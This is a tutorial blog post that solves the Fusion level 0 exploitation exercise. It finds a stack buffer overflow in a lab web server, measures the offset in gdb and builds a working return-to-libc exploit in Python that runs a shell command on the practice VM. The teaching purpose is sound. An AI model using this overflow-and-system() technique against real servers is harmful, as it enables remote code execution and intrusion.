Hey guys,

In this series of articles I will try to teach how to research and exploit bugs in programs. I will try to show how I think and work, as opposed to just showing the solution. Just like my math teacher used to say: “Show the work”. I believe it is more educational this way, and there is actually a chance you will learn something. If you just want to see the solution, feel free to skip to the summary at the end or read the code on my GitHub.

I will assume that you are a competent high-level programmer who can code complex programs in C. If that is not the case, I believe it will be more beneficial to you to learn how to code in C and Python first.

We will be doing the Fusion VM from exploit-exercises.com. Today we will be doing Fusion 0. The plan:
- Get a working server and client.
- Find a vulnerability (in this case a buffer overflow, as hinted on this stage’s page).
- Change the return address to that of the function system.
- Change the parameters that system receives so that we run whatever we want.
The first thing I did was to set up the host machine with the VM I downloaded from the exploit-exercises website. I made sure I could ssh into it and that it works.
Let’s understand what we are dealing with. We are given a web server running on TCP port 20000 on a VM we downloaded from the internet. Our goal is to find and exploit a bug in the server that will allow us to run arbitrary code on it.
The first thing we do is read the source code. If you don’t understand C well enough to explain the code, you are not ready to learn exploitation yet; your time will be better spent finding a good C programming course online and starting with it. I highly encourage that.
Understanding the program:
So we read the program and we understand the following:
- The program is a server that binds a port.
- It forks for each new connection.
- Every forked child then reads some input from stdin, validates it and basically prints some strings.
This only makes sense if we assume that the accepted connection is used as stdin and stdout of the forked child; otherwise, who would write the input for this server?
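To make that assumption concrete, here is a minimal sketch of the idea. It is not the Fusion server itself: one end of a socket pair is handed to a child process as its stdin and stdout, so the child uses ordinary reads and prints while the other end sees them as socket traffic. The helper name run_child_on_socket and the tiny echo child are hypothetical, and the sketch assumes a Unix-like system.

```python
import socket
import subprocess
import sys

# Hypothetical child program: reads one line from stdin, answers on stdout.
CHILD_CODE = (
    "import sys\n"
    "line = sys.stdin.readline()\n"
    "sys.stdout.write('got: ' + line)\n"
    "sys.stdout.flush()\n"
)


def run_child_on_socket(request):
    """Send request to a child whose stdin/stdout are a socket; return its reply."""
    parent_end, child_end = socket.socketpair()
    child = subprocess.Popen(
        [sys.executable, "-c", CHILD_CODE],
        stdin=child_end.fileno(),
        stdout=child_end.fileno(),
    )
    child_end.close()  # the child holds its own copies of the descriptor
    parent_end.sendall(request)
    reply = b""
    while not reply.endswith(b"\n"):
        chunk = parent_end.recv(1000)
        if not chunk:  # the child closed its end
            break
        reply += chunk
    child.wait()
    parent_end.close()
    return reply


print(run_child_on_socket(b"hello\n"))
```

The child never touches a socket API, which is why a server built this way can get away with plain reads from stdin and printf-style output.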
Anyway, we want to test this assumption, so we write a short Python script to connect to the server and communicate with it. We play with it and after a few iterations we get to this:

    #!/usr/bin/env python
    # Python 2 client for Fusion level 0
    import socket

    PORT = 20000
    HOST = "VM"


    def get_commands():
        # Requests to send, one string per request
        return ["GET /etc/hosts HTTP/1.1 "]


    def main():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        commands = get_commands()
        for c in commands:
            print "Sending:\"%s\"" % (c, )
            # The optional second argument of send() is a flags value,
            # not a length, so we pass only the data
            s.send(c)
            print "Reciving:\"%s\"" % (s.recv(1000), )
            print "Reciving:\"%s\"" % (s.recv(1000), )


    if __name__ == "__main__":
        main()
We run it:

    Sending:"GET /etc/hosts HTTP/1.1 "
    Reciving:"[debug] buffer is at 0xbf879c48 :-) "
    Reciving:"trying to access /etc/hosts "

So basically we have a working client to communicate with the server.
Now let’s look for vulnerabilities.
The simplest family of vulnerabilities I know is the stack buffer overflow, which happens when a program writes data to a variable stored on the stack past the variable’s length.
The easiest way to find them is to search for arrays defined on the stack. In this program we see 2 arrays on the stack:
- char resolved[128]; (in fix_path)
- char buffer[1024]; (in parse_http_request)
To count either of those as a stack overflow, we need to find an input that causes more data than the size of the variable to be copied into it. In this case, at least 129 or 1025 bytes respectively.
So, we tweak the function get_commands to try to overflow the buffer named buffer, we run the script… and… nothing happens. Or at least we don’t see anything different.
New get_commands function:

    def get_commands():
        pattern = "GET /etc/hosts HTTP/1.1 "
        # Pad the request up to the 1024 bytes of buffer
        padding_length = 1024 - len(pattern)
        padding = "a" * padding_length
        # Eight recognizable marker bytes that land past the end of buffer
        return [pattern + padding + "abcdefgh"]

This function returns a list with one string. Let’s understand it. The first part of the string is what I called pattern; it is just what I had to send in order to conform to the server’s protocol. Next comes the padding, a long string of ‘a’s that we use to fill the buffer up to the location where we think the overflow will happen. Why do we use ‘a’s? To make debugging what happens later easier.
You are probably wondering about this “abcdefgh”. Well, obviously these are the first 8 letters of the English alphabet :D. Why do we need them, you might ask? The answer is that if we overflow any variable, it is pretty easy to spot when we overflow it with known values.
What do we do next?
- Use a debugger to get a better understanding of what happened
- Try to work on the other potential buffer overflow.
I know what happened, but for now I prefer option number 2. Don’t worry, we will have plenty of opportunities to use debuggers in this series of articles.
So let’s work on the potential buffer overflow in fix_path. To do that, we need to pass a path which is longer than 128 bytes. After some trial and error we get to this:

    def get_commands():
        file_path = "/"
        pattern = "GET %s%s HTTP/1.1 "
        padding_length = 160
        # 160 'a's plus a "bbbb" marker, well past the 128 bytes of resolved
        padding = "a" * padding_length + "bbbb"
        return [pattern % (file_path, padding)]

And the output is this:

    Sending:"GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    Reciving:"[debug] buffer is at 0xbf879c48 :-) "
    Traceback (most recent call last):
      File "fusion0-overflow2.py", line 25, in <module>
        main()
      File "fusion0-overflow2.py", line 22, in main
        print "Reciving:\"%s\"" % (s.recv(1000), )
    socket.error: [Errno 104] Connection reset by peer

We can see that the server has stopped responding to us. This happened because we managed to overflow the buffer char resolved[128]. Somewhere after this buffer, the return address of the function fix_path is saved. We overwrote it with ‘a’s and ‘b’s and caused the function to return to a memory address which is not mapped.
We use a debugger to make sure we are right on that guess.

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to process 22996]
    0x61616161 in ?? ()

Well, we were right. We stopped at the address 0x61616161, which means that the memory holding the return address of fix_path was overwritten with 4 ‘a’s (0x61 is the ASCII code of ‘a’).
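A quick way to read such a crash address is to turn it back into the bytes that were sitting in memory. The sketch below assumes a 32-bit little-endian target, which is consistent with the 4-byte addresses seen here; address_to_bytes is a hypothetical helper name.

```python
import struct


def address_to_bytes(address):
    """Return the 4 bytes a little-endian machine stores for this address."""
    return struct.pack("<I", address)


print(address_to_bytes(0x61616161))  # the crash address seen in gdb
print(address_to_bytes(0x64636261))  # what an "abcd" marker would turn into
```

Because the byte order is little-endian, a marker such as "abcd" shows up reversed in the crash address, which is worth keeping in mind when the marker is not four identical letters.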
Now we want to figure out just how many ‘a’s we need before we reach the return address of fix_path. We could guess and brute force it until we find out, but I will just use a debugger.
If you don’t understand what I do in the session below, I suggest reading my gdb cheatsheet (coming soon).

    (gdb) b * fix_path
    Breakpoint 4 at 0x8049815: file level00/level00.c, line 4.
    (gdb) c
    Continuing.
    <run the client script>
    (gdb) x/10wx resolved+128
    0xbf879c20:     0xbf879c4c      0xb7826918      0x00000000      0x08049970
    0xbf879c30:     0xbf879c4c      0x00000020      0x00000004      0x00000000
    0xbf879c40:     0x001761e4      0xbf879cd0
    (gdb) x/i 0x08049970
       0x8049970 <parse_http_request+283>:  mov    eax,0x8049f17

The word 12 bytes after the end of the buffer (remember that every address is 4 bytes long, so it is the fourth word in the dump) looks like an address in the code segment: it starts with 0x8049, just like the address of fix_path. We check it, and it is indeed an address inside parse_http_request, the function that called fix_path. So we know that we need 140 bytes of file path (the 128 bytes of the buffer plus those 12 bytes), and right after them comes the return address of fix_path.
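The arithmetic behind that number can be written out as a small sketch. The values are copied from the gdb session above; the variable names are only illustrative, and the word size assumes the 32-bit target seen so far.

```python
RESOLVED_SIZE = 128  # size of the resolved array in fix_path
WORD_SIZE = 4        # bytes per word on the 32-bit target

# First row of the "x/10wx resolved+128" dump.
words_after_buffer = [0xbf879c4c, 0xb7826918, 0x00000000, 0x08049970]
saved_return_address = 0x08049970  # parse_http_request+283

# How many words sit between the end of resolved and the return address.
index = words_after_buffer.index(saved_return_address)
offset = RESOLVED_SIZE + index * WORD_SIZE
print(offset)
```

The result is the number of path bytes that must come before the four bytes that overwrite the return address.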
We test it by changing padding_length in the previous code to 139 (the leading “/” of the path is the 140th byte), and this time we get a crash at 0x62626262 (the same as 4 ‘b’s).
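An alternative to reading the offset out of the debugger (not the method used in this post) is to send a non-repeating pattern instead of ‘a’s and then look up the crash address inside that pattern. Below is a minimal sketch; make_pattern and find_offset are hypothetical helpers, the target is assumed to be 32-bit little-endian, and the pattern uses only letters and digits so that it contains no space.

```python
import itertools
import string
import struct


def make_pattern(length):
    """Build a pattern like Aa0Aa1Aa2... in which short windows do not repeat."""
    chunks = []
    triples = itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    )
    for upper, lower, digit in triples:
        if len(chunks) * 3 >= length:
            break
        chunks.append(upper + lower + digit)
    return "".join(chunks)[:length].encode("ascii")


def find_offset(pattern, fault_address):
    """Return where the 4 bytes of fault_address occur in pattern, or -1."""
    return pattern.find(struct.pack("<I", fault_address))


pattern = make_pattern(200)
# Pretend the crash address was made of the pattern bytes at offset 140.
fault_address = struct.unpack("<I", pattern[140:144])[0]
print(find_offset(pattern, fault_address))
```

In a real run the fault address would come from the debugger, and the offset would be counted from the start of whatever part of the path was replaced by the pattern.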
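After we overflow the buffer, this is how we would like the stack to look, where X is the address at which the return address of fix_path is saved:
- X: the address of system, which replaces the return address of fix_path.
- X + 4: the address of exit, which system will treat as its own return address.
- X + 8: the address of the command string, which system will treat as its parameter.
Take as much time as you need to understand this; it is the most important thing in this whole post.
And remember that X is where the return address of the function is saved, and X - 139 is where the padding we control begins (the byte at X - 140 is the leading “/” of the path).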
While connected to our target program with a debugger, we look up the address of system:

    (gdb) x/i *system
       0xb76bab20 <__libc_system>:  sub    esp,0x10

Why do we need exit? After system finishes doing its thing, we prefer the program to exit in a regular way rather than crash in a weird way.

    def get_commands():
        file_path = "/"
        pattern = "GET %s%s%s HTTP/1.1 "
        padding_length = 139
        padding = "a" * padding_length
        ADDRESS_OF_SYSTEM = 0xb76bab20
        ADDRESS_OF_EXIT = 0xb76b09e0
        ADDERSS_OF_BASH_LINE = 0x13371338  # placeholder for now
        # Needs "import struct" at the top of the script.
        # "<I" packs each address as a 4-byte little-endian value:
        # new return address, then system's return address, then its argument
        payload = (struct.pack("<I", ADDRESS_OF_SYSTEM) +
                   struct.pack("<I", ADDRESS_OF_EXIT) +
                   struct.pack("<I", ADDERSS_OF_BASH_LINE))
        return [pattern % (file_path, padding, payload)]

We run the new script while connected with a debugger, and we see that we get the invalid protocol error. After re-reading the source I understand the problem: the address of system, 0xb76bab20, contains the byte 0x20, which is ‘ ’ (space). The problem is that space is a separator in our protocol, so we can’t use it as part of the payload.
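This kind of problem is easy to check for before sending anything. The sketch below scans a packed payload for forbidden bytes; find_bad_bytes is a hypothetical helper, and the only forbidden byte it assumes is the space discussed above (other bytes may also be unsafe, which is not checked here).

```python
import struct

BAD_BYTES = b" "  # space separates the fields of the request


def find_bad_bytes(payload, bad_bytes=BAD_BYTES):
    """Return the offsets in payload that hold a forbidden byte."""
    forbidden = bytearray(bad_bytes)
    return [i for i, byte in enumerate(bytearray(payload)) if byte in forbidden]


# Address of system: its lowest byte is 0x20.
print(find_bad_bytes(struct.pack("<I", 0xb76bab20)))
# Address of exit: no space in it.
print(find_bad_bytes(struct.pack("<I", 0xb76b09e0)))
```

Running such a check on the whole payload after every change of address saves a round trip through the debugger.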
After thinking about it a little bit, I run the following line in gdb:

    (gdb) x/2i system-1
       0xb76bab1f:  nop
       0xb76bab20 <__libc_system>:  sub    esp,0x10

It seems I can just use the address of the instruction right before system, a nop that falls through into system, in order to avoid having 0x20 in the address. So I do it. This time it works, and with a debugger I find out that I stopped inside the function system!

    Breakpoint 3, __libc_system (line=0x13371338 <Address 0x13371338 out of bounds>) at ../sysdeps/posix/system.c:179
    179     ../sysdeps/posix/system.c: No such file or directory.
            in ../sysdeps/posix/system.c

See this 0x13371338? It’s the same as ADDERSS_OF_BASH_LINE, which means that we know how to pass the right parameter. We find the address of the buffer with a debugger and replace this placeholder number with the real address. We run the program again and it works. We verify by running ls on /tmp.
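The real address can also be cross-checked with a little arithmetic instead of the debugger. The sketch below assumes that the request is read into the buffer whose address the server prints in its debug line, that this address is the same on every run (as it was in the outputs above), and that the command string is appended after the protocol part of the request, as in the final script. build_request is a hypothetical helper that mirrors get_commands.

```python
import re
import struct

DEBUG_LINE = "[debug] buffer is at 0xbf879c48 :-)"  # printed by the server
BASH_LINE = b"touch /tmp/a; "                        # command we want to run


def build_request(command_address):
    """Build the request bytes the same way get_commands does."""
    payload = (struct.pack("<I", 0xb76bab1f) +   # one byte before system
               struct.pack("<I", 0xb76b09e0) +   # exit
               struct.pack("<I", command_address))
    return b"GET /" + b"a" * 139 + payload + b" HTTP/1.1 " + BASH_LINE


buffer_address = int(re.search(r"0x[0-9a-f]+", DEBUG_LINE).group(0), 16)
# The placeholder value does not change the length of the request.
offset = build_request(0).index(BASH_LINE)
command_address = buffer_address + offset
print(hex(command_address))
```

The computed value agrees with the address used for ADDERSS_OF_BASH_LINE in the final version of the code.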
Final version of the code:

    #!/usr/bin/env python
    # Python 2 exploit for Fusion level 0: return into system()
    import socket
    import struct

    PORT = 20000
    HOST = "VM"


    def get_commands():
        file_path = "/"
        pattern = "GET %s%s%s HTTP/1.1 "
        padding_length = 139
        padding = "a" * padding_length
        # One byte before system (a nop), to avoid a 0x20 byte in the address
        ADDRESS_OF_SYSTEM = 0xb76bab1f
        ADDRESS_OF_EXIT = 0xb76b09e0
        # Address of BASH_LINE inside the server's buffer
        ADDERSS_OF_BASH_LINE = 0xbf879cee
        BASH_LINE = "touch /tmp/a; "
        # "<I" packs each address as a 4-byte little-endian value
        payload = (struct.pack("<I", ADDRESS_OF_SYSTEM) +
                   struct.pack("<I", ADDRESS_OF_EXIT) +
                   struct.pack("<I", ADDERSS_OF_BASH_LINE))
        return [pattern % (file_path, padding, payload) + BASH_LINE]


    def main():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        commands = get_commands()
        for c in commands:
            print "Sending:\"%s\"" % (c, )
            # The optional second argument of send() is a flags value,
            # not a length, so we pass only the data
            s.send(c)
            print "Reciving:\"%s\"" % (s.recv(1000), )
            print "Reciving:\"%s\"" % (s.recv(1000), )


    if __name__ == "__main__":
        main()

If you have any questions or feedback I would love to hear from you in the comments below 🙂